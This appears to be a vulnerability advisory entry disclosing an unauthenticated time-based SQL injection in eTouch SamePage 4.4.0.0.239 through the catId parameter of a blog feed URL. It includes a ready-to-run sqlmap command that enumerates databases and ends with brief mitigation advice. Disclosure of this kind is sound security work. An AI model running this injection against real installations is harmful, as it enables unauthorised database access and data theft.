vendor:
SamePage
by:
Brandon Perry
7.5
CVSS
HIGH
Unauthenticated time-based SQL injection
89
CWE
Product Name: SamePage
Affected Version From: 4.4.0.0.239
Affected Version To: 4.4.0.0.239
Patch Exists: NO
Related CWE: N/A
CPE: a:etouch:samepage:4.4.0.0.239
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu
2020
eTouch SamePage v4.4.0.0.239 multiple vulnerabilities
The URL http://192.168.1.25:18080/cm/blogrss/feed?entity=mostviewedpost&analyticsType=blog&catId=-1&count=10&et_cw=850&et_ch=600 is vulnerable to a time-based SQL injection in the catId parameter. Exploitation with sqlmap can be done by using the command './sqlmap.py -u http://192.168.1.25:18080/cm/blogrss/feed?entity=mostviewedpost&analyticsType=blog&catId=-1&count=10&et_cw=850&et_ch=600 --dbms=mysql -p catId --level=5 --risk=3 -o --technique=t --time-sec=10 --dbs'
Mitigation:
The user should ensure that all input is properly sanitized and validated before being used in a SQL query.